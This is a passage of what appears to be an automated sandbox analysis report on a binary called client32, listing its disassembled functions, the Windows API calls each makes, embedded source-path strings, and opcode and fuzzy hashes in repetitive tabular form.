                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: swprintf
                                                                                                                              • String ID: $$%$+
                                                                                                                              • API String ID: 233258989-3202472541
                                                                                                                              • Opcode ID: 51dced2a2985a59ef63a696a59479f638707418e9379f640e453f86fe788b150
                                                                                                                              • Instruction ID: 709c54241741de87a29271ffeb556a2f401356d1bb5d83c5dcf625fd940d7789
                                                                                                                              • Opcode Fuzzy Hash: 51dced2a2985a59ef63a696a59479f638707418e9379f640e453f86fe788b150
                                                                                                                              • Instruction Fuzzy Hash: 6C515EF6E002499ADB16CE58C8847CE7BF5FB15304F3085C5ED44AB29AEA3DC994CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110D12E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _memmove.LIBCMT ref: 110D1378
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                                                              • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                                                              • API String ID: 1528188558-323366856
                                                                                                                              • Opcode ID: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                                                                              • Instruction ID: ca0f400cc3ae87bce4a96c7d882a21a9a029a19775e55ac1937322abd3584148
                                                                                                                              • Opcode Fuzzy Hash: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                                                                              • Instruction Fuzzy Hash: 0C212639B007566BDB01CF99EC90F9AF3E5AFD1288F048469E99997701EE31F4058398
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110183B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MetricsSystem$FindWindow
                                                                                                                              • String ID: IPTip_Main_Window
                                                                                                                              • API String ID: 3964754823-293399287
                                                                                                                              • Opcode ID: 338d81376081f096a8910d24601292b11f0403676c3425d7a8f136870903a89b
                                                                                                                              • Instruction ID: 48eceb47ebeb3c7c94f5e0ea21fac0982c3091e714c0091f6a40e808b7a20a73
                                                                                                                              • Opcode Fuzzy Hash: 338d81376081f096a8910d24601292b11f0403676c3425d7a8f136870903a89b
                                                                                                                              • Instruction Fuzzy Hash: 1411E53AD80229A7DF01DAE05E41BDE77AC5B00249F0045EBED05AB048EE69D70586E1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11153570 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _memmove.LIBCMT ref: 111535AC
                                                                                                                              • _memmove.LIBCMT ref: 111535E6
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove$ErrorExitLastMessageProcesswsprintf
                                                                                                                              • String ID: ..\ctl32\WCUNPACK.C$n > 128
                                                                                                                              • API String ID: 6605023-1396654219
                                                                                                                              • Opcode ID: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                                                                              • Instruction ID: 7dc9b17917a05d0a1a20c6fa4ac0eb705d74e08118df21bf74e35568faeb592c
                                                                                                                              • Opcode Fuzzy Hash: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                                                                              • Instruction Fuzzy Hash: 0A1125B6C3916577C3818E6A9D85A9BFB68BB4236CF048115FCB817241E771A614C7E0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11014310 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateWindowExA.USER32 ref: 1101434C
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateErrorExitLastMessageProcessWindowwsprintf
                                                                                                                              • String ID: ..\ctl32\headctrl.cpp$SysHeader32$m_hWnd
                                                                                                                              • API String ID: 2789554107-4050302278
                                                                                                                              • Opcode ID: 7128a90106a9f6b549252445498b8c8851c41fc8150169f4254d7cc760935a86
                                                                                                                              • Instruction ID: 47ca1da31ef5e317866de86f9591e30fe02a5225a1dd4fd0741b7edf9cd601c6
                                                                                                                              • Opcode Fuzzy Hash: 7128a90106a9f6b549252445498b8c8851c41fc8150169f4254d7cc760935a86
                                                                                                                              • Instruction Fuzzy Hash: 4C014B7621021ABBCB54DE99DC85EDBB7ADAF88608F008159F919A7240D630E850CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11015400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110AB01D
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                              • String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
                                                                                                                              • API String ID: 819365019-2727927828
                                                                                                                              • Opcode ID: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                                                                              • Instruction ID: c68bebcfb275c132091ba8ffe4505af5196cb7164de974b36e44453814cc3cc0
                                                                                                                              • Opcode Fuzzy Hash: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                                                                              • Instruction Fuzzy Hash: 4DF02B34FC0720AFD720D581EC42FCAB3D4AB05709F004469F5562A2D1E5B0B8C0C7D1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110ED470 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • IsWindow.USER32(?), ref: 110ED498
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                                                                              • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                                                                              • API String ID: 2577986331-1331251348
                                                                                                                              • Opcode ID: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
                                                                                                                              • Instruction ID: 93283a680bb1c801d139a1839617fb2f1f19efec68c8bcedb592c4b0da2aa86f
                                                                                                                              • Opcode Fuzzy Hash: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
                                                                                                                              • Instruction Fuzzy Hash: 8DF0E279E036327BD612A9177C0AFCFF768DBA1AA9F058061F80D26101EB34720082E9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1101D3C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32 ref: 1101D3EB
                                                                                                                              • EnableWindow.USER32(00000000,?), ref: 1101D3F6
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                              • API String ID: 1136984157-1986719024
                                                                                                                              • Opcode ID: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                                                                              • Instruction ID: 36c1a6ee6805b1b90e48090b7f41ce0c53d42d7852bf61e64861d4a713bbcb04
                                                                                                                              • Opcode Fuzzy Hash: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                                                                              • Instruction Fuzzy Hash: E3E0867950022DBFC7149E91DC85EAAF35CEB44269F00C135F96656644D674E84087A4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1101D410 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32 ref: 1101D43F
                                                                                                                              • ShowWindow.USER32(00000000), ref: 1101D446
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                              • API String ID: 1319256379-1986719024
                                                                                                                              • Opcode ID: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
                                                                                                                              • Instruction ID: e0f7042720cd81023d22bad3d6b473d4ff1ed87f82d399384176be7cf1b5ebc2
                                                                                                                              • Opcode Fuzzy Hash: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
                                                                                                                              • Instruction Fuzzy Hash: D3E04F7594032DBBC7049A95DC89EEAB39CEB54229F008025F92556600E670A84087A0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11008359 Relevance: 6.1, APIs: 4, Instructions: 68windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Object$CompatibleCreateDeleteSelect$Bitmap_free_malloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4288422576-0
                                                                                                                              • Opcode ID: 91c89b74b91c336bb3830d7201085ffe0f6e2ebe70c7ebf5e74ffc9f1e31602d
                                                                                                                              • Instruction ID: 71ddcf67a8684a935c6e16c4ea2a73cd506f955dbb6c56238cfab8e0aaa932bb
                                                                                                                              • Opcode Fuzzy Hash: 91c89b74b91c336bb3830d7201085ffe0f6e2ebe70c7ebf5e74ffc9f1e31602d
                                                                                                                              • Instruction Fuzzy Hash: 8421FF79610A019FD364DF28C994AE7B3E9FBC8318F10891DE56A97311CB31F842CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11160450 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
